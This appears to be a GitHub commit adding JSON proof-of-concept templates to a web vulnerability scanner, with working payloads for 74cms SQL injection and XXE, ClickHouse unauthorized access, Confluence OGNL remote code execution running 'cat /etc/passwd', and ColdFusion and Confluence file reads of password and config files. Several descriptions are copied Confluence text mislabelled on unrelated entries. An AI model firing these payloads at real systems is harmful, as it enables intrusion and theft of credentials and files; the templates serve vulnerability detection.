-
Notifications
You must be signed in to change notification settings - Fork 670
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
集成 @xiaotu0821 chumeng 师傅的json版本POC for Web-Scan 2022-08-18
- Loading branch information
Showing
205 changed files
with
8,201 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| { | ||
| "Name": "74cms-sqli-1", | ||
| "Description": "74cms-sqli-1", | ||
| "Product": "骑士cms", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "POST", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", | ||
| "Content-Type":"text/xml"}, | ||
| "Uri":"/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\\xc3\\x97tamp=&nonce=", | ||
| "Port":"", | ||
| "Data":"<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE copyright [<!ENTITY test SYSTEM \"file:///\">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5(123)#</Content></xml>", | ||
| "follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "202cb962ac59075b964b07152d234b70" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| { | ||
| "Name": "74cms-sqli-2", | ||
| "Description": "74cms-sqli-2", | ||
| "Product": "骑士cms", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "GET", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"}, | ||
| "Uri":"/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23", | ||
| "Port":"", | ||
| "Data":"", | ||
| "follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "202cb962ac59075b964b07152d234b70" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ] } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| { | ||
| "Name": "74cms-sqli-3", | ||
| "Description": "74cms-sqli-3", | ||
| "Product": "骑士cms", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "GET", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"}, | ||
| "Uri":"/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa\") and extractvalue(1,concat(0x7e,md5(99999999))) -- a", | ||
| "Port":"", | ||
| "Data":"", | ||
| "follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "ef775988943825d2871e1cfa75473ec" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| { | ||
| "Name": "ClickHouse未授权访问", | ||
| "Description": "ClickHouse数据库未授权访问查询", | ||
| "Product": "ClickHouse", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "GET", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"}, | ||
| "Uri":"/?query=SHOW%20tables%20from%20system", | ||
| "Port":"", | ||
| "Data":"", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "zeros_mt" | ||
| }, | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "aggregate_function_combinators" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
|
|
||
|
|
||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| { | ||
| "Name": "Confluence OGNL表达式注入", | ||
| "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中,并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码.", | ||
| "Product": "Atlassian Confluence", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "POST", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", | ||
| "Content-Type":"application/x-www-form-urlencoded"}, | ||
| "Uri":"/pages/createpage-entervariables.action?SpaceKey=x", | ||
| "Port":"", | ||
| "Data":"queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat+/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "root:x:0:0:root" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| { | ||
| "Name": "CVE-2021-26084Confluence远程代码执行漏洞", | ||
| "Description": "Confluence", | ||
| "Product": "Confluence", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "POST", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"}, | ||
| "Uri":"/pages/doenterpagevariables.action", | ||
| "Port":"", | ||
| "Data":"queryString=aaaa\\u0027%2b#{3*333}%2b\\u0027bbb", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "aaaa{999" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| { | ||
| "Name": "coldfusion-cve-2010-2861-lfi", | ||
| "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中,并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码.", | ||
| "Product": "Atlassian Confluence", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "GET", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", | ||
| "Content-Type":"application/x-www-form-urlencoded"}, | ||
| "Uri":"/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", | ||
| "Port":"", | ||
| "Data":"", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "rdspassword" | ||
| }, | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "encrypted=" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| { | ||
| "Name": "confluence-cve-2015-8399", | ||
| "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中,并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码.", | ||
| "Product": "Atlassian Confluence", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "GET", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"}, | ||
| "Uri":"/spaces/viewdefaultdecorator.action?decoratorName", | ||
| "Port":"", | ||
| "Data":"", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "confluence-init.properties" | ||
| }, { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "View Default Decorator" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| { | ||
| "Name": "confluence-cve-2019-3396-lfi", | ||
| "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中,并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码.", | ||
| "Product": "Atlassian Confluence", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "POST", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", | ||
| "Content-Type":"application/json","Host":"localhost","Referer":"http://localhost"}, | ||
| "Uri":"/rest/tinymce/1/macro/preview", | ||
| "Port":"", | ||
| "Data":"{\"contentId\":\"786458\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/test\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "<param-name>contextConfigLocation</param-name>" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
37 changes: 37 additions & 0 deletions
37
config/poc/Confluence/confluence-cve-2021-26085-arbitrary-file-read.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| { | ||
| "Name": "confluence-cve-2021-26085-arbitrary-file-read", | ||
| "Description": "Atlassian Confluence是企业广泛使用的wiki系统,产品研发过程中的需求文档、产品设计文档、项目管理文档、技术文档、运维文档等等都统一发布在wiki中,并不断地迭代维护。所以想着自己的协同的办公也可使Confluence来实现,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码.", | ||
| "Product": "Atlassian Confluence", | ||
| "author": "chumeng", | ||
| "Request":[ | ||
| { | ||
| "Method": "GET", | ||
| "Header": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", | ||
| "Content-Type":"application/x-www-form-urlencoded"}, | ||
| "Uri":"/s/avacea/_/;/WEB-INF/web.xml", | ||
| "Port":"", | ||
| "Data":"", | ||
| "Follow_redirects":"false", | ||
| "Upload":{"Name": "","fileName": "","filePath": "" }, | ||
| "Response":{ | ||
| "Check_Steps":"AND", | ||
| "Checks": [ | ||
| { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "<display-name>Confluence</display-name>" | ||
| }, { | ||
| "Operation": "contains", | ||
| "Key":"", | ||
| "Value": "com.atlassian.confluence.setup.ConfluenceAppConfig" | ||
| }, | ||
| { | ||
| "Operation": "code", | ||
| "Key":"", | ||
| "Value": "200" | ||
| } | ||
| ] | ||
| }, | ||
| "Next_decide":"" | ||
| } | ||
| ]} |
Oops, something went wrong.